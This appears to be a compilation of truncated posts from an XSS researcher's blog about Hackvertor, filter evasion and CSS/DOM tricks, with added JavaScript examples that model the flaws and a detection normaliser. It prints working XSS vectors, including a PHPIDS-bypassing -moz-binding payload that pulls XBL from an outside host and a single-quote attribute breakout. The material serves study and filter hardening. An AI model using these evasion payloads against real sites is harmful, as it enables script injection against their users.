Future plans
I’ve done a big change in the Hackvertor code to pave the way for some new features. In future I plan to create a web service where we can create/share Hackvertor tags for free. This will enable custom versions of Hackvertor for a specific task, for example we could have a SQL injection version, [...]
I’ve put together a simple script which uses the JavaScript parser itself to find a list of valid variable names. This information is useful to know when testing XSS filters or malicious JavaScript detection, because a filter that only recognises ASCII identifiers will miss a variable spelled with unusual characters. Using these unusual variables I’ve managed to slip JavaScript past some very clever filters, including the PHPIDS and NoScript.
Check it out [...]
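The post above describes asking the JavaScript engine which characters it will accept in a variable name. The block below is an added example (not the post’s own script) that does the same thing in Node: each candidate character is compiled inside an object literal rather than a bare `var` statement, so separators such as a comma or a line terminator cannot slip through as a second statement; the check passes only if the engine builds exactly one key spelled with the candidate. The range scanned at the bottom is an arbitrary choice for illustration.

```javascript
// Added example: probe the engine's own parser for identifier characters.
// Not the original post's script; function names are this example's own.

// True if `ch` is accepted in the middle of an identifier.
// "{a<ch>b: 1}" is a single key only when <ch> is an identifier part:
// "," gives two keys, ";" / whitespace / punctuation give a SyntaxError.
function isIdentifierPart(ch) {
  try {
    const obj = new Function("var a = 0; return ({a" + ch + "b: 1});")();
    const keys = Object.keys(obj);
    return keys.length === 1 && keys[0] === "a" + ch + "b";
  } catch (e) {
    return false; // SyntaxError: the engine refused the character here
  }
}

// True if `ch` may begin an identifier. Whitespace such as U+00A0 compiles
// ("{ b: 1}") but produces the key "b", so the key comparison rejects it.
function isIdentifierStart(ch) {
  try {
    const obj = new Function("return ({" + ch + "b: 1});")();
    const keys = Object.keys(obj);
    return keys.length === 1 && keys[0] === ch + "b";
  } catch (e) {
    return false;
  }
}

// Scan a code point range; `part` lists continue-only characters
// (digits, ZWNJ/ZWJ, combining marks) that cannot start a name.
function scanIdentifierChars(fromCp, toCp) {
  const start = [];
  const part = [];
  for (let cp = fromCp; cp <= toCp; cp++) {
    const ch = String.fromCodePoint(cp);
    if (isIdentifierStart(ch)) {
      start.push(cp);
    } else if (isIdentifierPart(ch)) {
      part.push(cp);
    }
  }
  return { start, part };
}

// Small demonstration range (Latin-1 Supplement), chosen for this example.
const latin1 = scanIdentifierChars(0xa0, 0xff);
console.log(
  "identifier-start code points in U+00A0..U+00FF:",
  latin1.start.map((cp) => "U+" + cp.toString(16).toUpperCase().padStart(4, "0")).join(" ")
);
```

The single-character probe does not cover `\uXXXX` escapes inside a name (`\u0061lert` is also a valid spelling of `alert`), so a filter test should try both forms. Scanning the whole BMP compiles 65,536 tiny functions and takes a few seconds; that is fine for a one-off table but not for a per-request check.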
It’s amazing the stuff I’ve been finding recently; my browser has crashed more times than windoze. In this article I’ll introduce you to using the DOM for unexpected things and hacking it to your advantage. I’ve learned all this new stuff while hacking vectors for the sla.ckers XSS contest, which is really fun.
Contents [...]
I’ve been having a lot of fun with the sla.ckers XSS replication contest and I found a cool way to replicate the source code of the HTML document which I haven’t seen anywhere before. Check it out:-
alert(document.body.parentNode.innerHTML)
This alerts the entire HTML document in Firefox (hopefully in IE7 as well), which is pretty cool. Strictly it is the innerHTML of the html element, so you get the head and body but not the doctype or the html tag itself.
Here is my [...]
I’ve created a separate tool for HTML/JS fuzzing, I decided to do this because Hackvertor does all the hard work of conversion and I can simply extend the functionality without writing much code. The tool is already very powerful and lets you traverse unicode characters and perform whatever conversions you require and in any position [...]
In the second part of JavaScript for hackers I shall show how pointless it is to ban the words document, location etc. within form variables.
You can create some truly amazing strings which are unreadable to the human eye; many more vectors are available on the sla.ckers thread I created, but I’ll show [...]
Developers place too much trust in everything: they assume that certain data cannot be faked, and so these pieces of data can be used as a Trojan horse. Let’s take the remote IP of a user. It seems a trusted source because of the TCP/IP connection between the user and the server, but take the [...]
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin, which I modified slightly; in doing so I found that IE will also accept HTML entities in CSS styles.
Credits update
The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one [...]
Time and time again I’ve seen developers use htmlentities and expect it to protect variables from all XSS. This is wrong of course, because the function only replaces single quote characters when its second parameter is set to ENT_QUOTES; with the default flags it encodes double quotes but leaves single quotes untouched, so a value placed inside a single-quoted attribute can still break out. Some developers aren’t even aware that quotes can lead to XSS injection.
This leads me to my [...]
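The following is an added example, not code from the original post, and it is written in JavaScript rather than PHP: the two escaping functions are a model of what PHP’s htmlentities() does with and without ENT_QUOTES (only the characters that matter for the attribute context are modelled), the template renderInput is hypothetical, and the payload is a constructed sample. The attribute splitter shows what a browser would see: with the default flags the injected onmouseover becomes a second attribute, with ENT_QUOTES the whole payload stays inside the value. Note that PHP 8.1 changed the default flags of htmlentities() to include ENT_QUOTES; the post predates that, and code that passes an explicit older flag set still has the problem.

```javascript
// Added example: JavaScript model of htmlentities() with and without
// ENT_QUOTES. Not the post's code; names below are this example's own.

// Models htmlentities($s) with the pre-8.1 default (ENT_COMPAT):
// &, <, > and double quotes are encoded, single quotes are not.
function htmlentitiesDefault(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Models htmlentities($s, ENT_QUOTES): additionally encodes single quotes.
function htmlentitiesEntQuotes(s) {
  return htmlentitiesDefault(s).replace(/'/g, "&#039;");
}

// Hypothetical template that places user input in a single-quoted attribute.
function renderInput(userValue, escape) {
  return "<input type='text' name='q' value='" + escape(userValue) + "'>";
}

// Minimal attribute splitter for one rendered tag: returns the attribute
// names a browser would see. An injected event handler appears as an extra
// name; a payload that stayed inside the value does not.
function attributeNames(tag) {
  const body = tag.replace(/^<\w+\s*/, "").replace(/\s*\/?>$/, "");
  const re = /([^\s=]+)=(?:'([^']*)'|"([^"]*)"|(\S*))/g;
  const names = [];
  let m;
  while ((m = re.exec(body)) !== null) {
    names.push(m[1]);
  }
  return names;
}

// Constructed sample input: closes the single-quoted value and adds a handler.
const payload = "' onmouseover='alert(1)";

console.log("default:    ", renderInput(payload, htmlentitiesDefault));
console.log("attributes: ", attributeNames(renderInput(payload, htmlentitiesDefault)));
console.log("ENT_QUOTES: ", renderInput(payload, htmlentitiesEntQuotes));
console.log("attributes: ", attributeNames(renderInput(payload, htmlentitiesEntQuotes)));
```

The splitter is deliberately simple (it assumes a well-formed single tag) because its only job is to make the extra attribute visible; the fix itself is the escaping function, and the same logic applies to any HTML encoder that can be told which quote characters to encode.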
Hacking the PHPIDS again, I found some cool XSS:-
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
I’ve moved it onto two lines for correct display.
Who’d have thought that Firefox would allow all that within the URL and CSS properties? The backslashes are ordinary CSS escapes: a backslash before a non-hex character simply stands for that character, so by the time the property name is matched the tokenizer has already turned the mess above into -moz-binding:url(...). Any filter that matches on the raw text sees something quite different from what the browser sees.
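The two vectors above rely on the same thing: the browser decodes the style before it interprets it (HTML entities in the attribute value on IE, CSS backslash escapes in Firefox), while a filter that matches on the raw text does not. The block below is an added example, not code from the post or from PHPIDS, showing the normalisation a detector needs before matching: numeric HTML entities first, then CSS escapes following the CSS Syntax rule for an escaped code point (a backslash followed by up to six hex digits and optional whitespace is a code point; a backslash before anything else is that character). The function names and the small sample list of dangerous properties are this example’s own; the -moz-binding vector is the one from the post (joined back onto one line), and -moz-binding/XBL has long since been removed from Firefox.

```javascript
// Added example: normalise a style attribute the way a browser would before
// matching it. Not the post's or PHPIDS's code; function names are this
// example's own.

// Decode numeric character references (&#45; &#x2d;) as an HTML attribute
// value parser would; named entities are out of scope for this example.
function decodeNumericEntities(s) {
  return s.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);?/g, (m, num) => {
    const cp = /^[xX]/.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
  });
}

// Decode CSS backslash escapes per "consume an escaped code point":
//   "\" + 1..6 hex digits (+ optional whitespace) -> that code point
//   "\" + newline                                 -> dropped
//   "\" + any other character                     -> that character
// So "\-\mo\z\-b\i\nd\in\g" becomes "-moz-binding", but note that
// "\binding" does NOT: "b" is a hex digit, so "\b" is U+000B.
function decodeCssEscapes(css) {
  let out = "";
  for (let i = 0; i < css.length; i++) {
    const ch = css[i];
    if (ch !== "\\") {
      out += ch;
      continue;
    }
    const rest = css.slice(i + 1);
    if (rest === "") {
      out += "\uFFFD"; // lone backslash at end of input
      break;
    }
    const hex = /^[0-9a-fA-F]{1,6}[ \t\n\f\r]?/.exec(rest);
    if (hex) {
      let cp = parseInt(hex[0].trim(), 16);
      if (cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) {
        cp = 0xfffd;
      }
      out += String.fromCodePoint(cp);
      i += hex[0].length;
    } else if (rest[0] === "\n") {
      i += 1; // escaped newline
    } else {
      out += rest[0];
      i += 1;
    }
  }
  return out;
}

// What the browser ends up interpreting for a style="..." attribute.
function normalizeStyle(attrValue) {
  return decodeCssEscapes(decodeNumericEntities(attrValue));
}

// Sample detector: match on the decoded text, not the raw attribute.
// The property list is a small illustrative set, not PHPIDS's rules.
function looksLikeScriptableCss(attrValue) {
  return /(-moz-binding|behavior)\s*:|expression\s*\(/i.test(normalizeStyle(attrValue));
}

// The post's PHPIDS-bypass vector, joined back onto one line (constructed
// here as a JavaScript string literal, hence the doubled backslashes).
const postVector =
  "\\-\\mo\\z\\-b\\i\\nd\\in\\g:\\url(//business\\i\\nfo.co.uk\\/labs\\/xbl\\/xbl\\.xml\\#xss)";

console.log("raw:    ", postVector);
console.log("decoded:", normalizeStyle(postVector));
console.log("flagged:", looksLikeScriptableCss(postVector));
```

The order of the two decoders matters: the HTML parser hands the CSS engine an already entity-decoded attribute value, so `&#92;` becomes a backslash that the CSS tokenizer then treats as an escape. A detector that runs the stages in the other order, or only one of them, can be bypassed by layering the encodings the same way.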